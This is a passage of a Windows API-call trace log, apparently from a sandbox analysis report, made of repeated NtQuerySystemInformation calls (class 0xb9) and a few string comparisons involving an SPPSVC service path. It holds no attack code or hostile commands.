(SystemInformationClass=0xb9, SystemInformation=0xa781ffecd0, Length=0x28, ResultLength=0x0) [0232.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffed40, Length=0x28, ResultLength=0x0) [0232.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeea0, Length=0x38, ResultLength=0x0) [0232.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffedc0, Length=0x28, ResultLength=0x0) [0232.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffedc0, Length=0x28, ResultLength=0x0) [0232.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeea0, Length=0x38, ResultLength=0x0) [0232.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffed20, Length=0x20, ResultLength=0x0) [0232.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeca0, Length=0x20, ResultLength=0x0) [0232.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeca0, Length=0x20, ResultLength=0x0) [0232.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeca0, Length=0x20, ResultLength=0x0) [0232.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeea0, Length=0x38, ResultLength=0x0) [0232.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffed20, Length=0x20, ResultLength=0x0) [0232.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffecb0, Length=0x20, ResultLength=0x0) [0232.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffecb0, Length=0x20, ResultLength=0x0) [0232.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff080, Length=0x50, ResultLength=0x0) [0232.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff080, Length=0x50, ResultLength=0x0) [0232.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff080, Length=0x50, ResultLength=0x0) [0232.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffef70, Length=0x50, ResultLength=0x0) [0232.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffef70, Length=0x50, ResultLength=0x0) [0232.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffef70, Length=0x50, ResultLength=0x0) [0232.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffef70, Length=0x50, ResultLength=0x0) [0232.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeea0, Length=0x38, ResultLength=0x0) [0232.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffecd0, Length=0x28, ResultLength=0x0) [0232.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffecd0, Length=0x28, ResultLength=0x0) [0232.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffecd0, Length=0x28, ResultLength=0x0) [0232.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffed40, Length=0x28, ResultLength=0x0) [0232.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeea0, Length=0x38, ResultLength=0x0) [0232.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffedc0, Length=0x28, ResultLength=0x0) [0232.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffedc0, Length=0x28, ResultLength=0x0) [0232.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeea0, Length=0x38, ResultLength=0x0) [0232.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffed20, Length=0x20, ResultLength=0x0) [0232.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeca0, Length=0x20, ResultLength=0x0) [0232.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeca0, Length=0x20, ResultLength=0x0) [0232.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeca0, Length=0x20, ResultLength=0x0) [0232.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeea0, Length=0x38, ResultLength=0x0) [0232.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffed20, Length=0x20, ResultLength=0x0) [0232.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffecb0, Length=0x20, ResultLength=0x0) [0232.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffecb0, Length=0x20, ResultLength=0x0) [0232.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff130, Length=0x50, ResultLength=0x0) [0232.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff0b0, Length=0x28, ResultLength=0x0) [0232.942] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0232.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff130, Length=0x50, ResultLength=0x0) [0232.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff130, Length=0x50, ResultLength=0x0) [0232.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff130, Length=0x50, ResultLength=0x0) [0232.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff060, Length=0x38, ResultLength=0x0) [0232.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee90, Length=0x28, ResultLength=0x0) [0232.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee90, Length=0x28, ResultLength=0x0) [0232.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee90, Length=0x28, ResultLength=0x0) [0232.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffef00, Length=0x28, ResultLength=0x0) [0232.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff060, Length=0x38, ResultLength=0x0) [0232.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffef80, Length=0x28, ResultLength=0x0) [0232.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffef80, Length=0x28, ResultLength=0x0) [0232.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff060, Length=0x38, ResultLength=0x0) [0232.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeee0, Length=0x20, ResultLength=0x0) [0232.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee60, Length=0x20, ResultLength=0x0) [0232.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee60, Length=0x20, ResultLength=0x0) [0232.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee60, Length=0x20, ResultLength=0x0) [0232.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff060, Length=0x38, ResultLength=0x0) [0232.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeee0, Length=0x20, ResultLength=0x0) [0232.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee70, Length=0x20, ResultLength=0x0) [0232.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee70, Length=0x20, ResultLength=0x0) [0232.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff130, Length=0x50, ResultLength=0x0) [0232.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff0b0, Length=0x28, ResultLength=0x0) [0232.951] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0232.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff130, Length=0x50, ResultLength=0x0) [0232.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff130, Length=0x50, ResultLength=0x0) [0232.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff130, Length=0x50, ResultLength=0x0) [0232.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff060, Length=0x38, ResultLength=0x0) [0232.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee90, Length=0x28, ResultLength=0x0) [0232.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee90, Length=0x28, ResultLength=0x0) [0232.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee90, Length=0x28, ResultLength=0x0) [0232.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffef00, Length=0x28, ResultLength=0x0) [0232.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff060, Length=0x38, ResultLength=0x0) [0232.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffef80, Length=0x28, ResultLength=0x0) [0232.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffef80, Length=0x28, ResultLength=0x0) [0232.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff060, Length=0x38, ResultLength=0x0) [0232.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeee0, Length=0x20, ResultLength=0x0) [0232.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee60, Length=0x20, ResultLength=0x0) [0232.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee60, Length=0x20, ResultLength=0x0) [0232.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee60, Length=0x20, ResultLength=0x0) [0232.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff060, Length=0x38, ResultLength=0x0) [0232.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeee0, Length=0x20, ResultLength=0x0) [0232.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee70, Length=0x20, ResultLength=0x0) [0232.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee70, Length=0x20, ResultLength=0x0) [0232.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff0d0, Length=0x50, ResultLength=0x0) [0232.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff050, Length=0x28, ResultLength=0x0) [0232.960] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0232.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff0d0, Length=0x50, ResultLength=0x0) [0232.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff0d0, Length=0x50, ResultLength=0x0) [0232.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff0d0, Length=0x50, ResultLength=0x0) [0232.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff000, Length=0x38, ResultLength=0x0) [0232.962] 